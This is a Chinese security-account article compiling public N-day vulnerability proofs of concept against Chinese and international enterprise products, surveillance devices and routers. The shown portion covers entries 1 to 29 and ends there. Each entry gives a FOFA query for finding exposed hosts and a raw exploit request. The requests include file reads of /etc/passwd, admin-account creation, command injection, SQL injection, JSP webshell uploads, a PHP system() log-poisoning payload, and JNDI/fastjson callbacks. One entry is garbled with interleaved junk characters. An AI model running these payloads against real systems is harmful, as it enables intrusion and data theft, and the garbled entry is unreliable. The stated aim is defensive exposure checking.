Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive and defensive exercises. We hope this article helps defenders; blue-team members can use its contents to check their own exposure.

Sources: this article covers 203 high-impact vulnerability POCs disclosed publicly in China and abroad between September 2023 and May 2024. All were collected from other public WeChat accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long have their payload replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to receive the full list". This article is the most complete version; when using it, press F12 and search for the keyword you need.
Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 (Phicomm) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT integrated management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
26. 用友 (Yonyou) NC linkVoucher SQL injection
27. 用友 (Yonyou) NC showcontent SQL injection
28. 用友 (Yonyou) NC grouptemplet arbitrary file upload
29. 用友 (Yonyou) NC down/bill SQL injection
30. 用友 (Yonyou) NC importPml SQL injection
31. 用友 (Yonyou) NC runStateServlet SQL injection
32. 用友 (Yonyou) NC complainbilldetail SQL injection
33. 用友 (Yonyou) NC downTax/download SQL injection
34. 用友 (Yonyou) NC warningDetailInfo interface SQL injection
35. 用友 (Yonyou) NC-Cloud importhttpscer arbitrary file upload
36. 用友 (Yonyou) NC-Cloud soapFormat XXE
37. 用友 (Yonyou) NC-Cloud IUpdateService XXE
38. 用友 (Yonyou) U8 Cloud smartweb2.RPC.d XXE
39. 用友 (Yonyou) U8 Cloud RegisterServlet SQL injection
40. 用友 (Yonyou) U8-Cloud XChangeServlet XXE
41. 用友 (Yonyou) U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 (Yonyou) GRP-U8 SmartUpload01 file upload
43. 用友 (Yonyou) GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 (Yonyou) GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 (Yonyou) GRP-U8 ufgovbank XXE
46. 用友 (Yonyou) GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 (Yonyou) GRP A++Cloud government finance cloud arbitrary file read
48. 用友 (Yonyou) U8 CRM swfupload arbitrary file upload
49. 用友 (Yonyou) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 (Chanjet) T+ getdecallusers information disclosure
56. 畅捷通 (Chanjet) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 (Chanjet) T+ keyEdit.aspx SQL injection
58. 畅捷通 (Chanjet) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信 (QiAnXin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 (QiAnXin) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 (Phicomm) router RCE
FOFA: icon_hash="-1344736688"
Log in to the backend with the default account admin, then send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double-URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain a cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The injected function runs a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 (Dahua) ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华 (Dahua) ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. 大华 (Dahua) ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 (Dahua) ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}


8 H4 j) @' L V( u5 L& @24. 用友NC 6.5 accept.jsp任意文件上传
9 c8 d4 w6 k! w- k) CFOFA:icon_hash="1085941792"
0 o7 G2 `9 e* b7 \* R+ k8 c) _POST /aim/equipmap/accept.jsp HTTP/1.1
6 u& R2 Q5 @; T/ i* {Host: x.x.x.x4 D; o. o5 h# _$ k. B9 A5 q0 z7 c
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
9 I6 P1 N# F8 |Connection: close
6 L& L% C b; ]3 B- k' F% U$ h* l: HContent-Length: 449
4 M1 h1 ^2 w2 t5 t3 U" uAccept: */*
]- I* t4 U, U: Z6 M9 {$ ^1 ZAccept-Encoding: gzip
! t% g, n+ K% d6 f9 jContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 R9 x# r5 A0 h0 s" _/ i$ G8 J3 c% G
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% k2 Y/ V/ G5 T$ r6 K5 o _6 N/ xContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"4 D1 r E+ g; \1 [4 C/ B
Content-Type: text/plain
% y5 d1 L9 \& g }' U6 [; L& T5 T5 b) A) x4 V
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
; T: z6 y6 r: S3 x7 q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc* J% ?! m7 A+ e1 u$ r. L" W
Content-Disposition: form-data; name="fname"
: q( h# a; R5 _2 P" b7 ^5 B5 k. z3 i, `+ x% ?
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp4 {' o3 Q# o+ R2 c
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ N/ N# }% M# d p' I3 S( l
. [# ]% ]: z: Y/ S3 J/ v6 n) W/ t- I4 e/ H6 ^3 e
25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
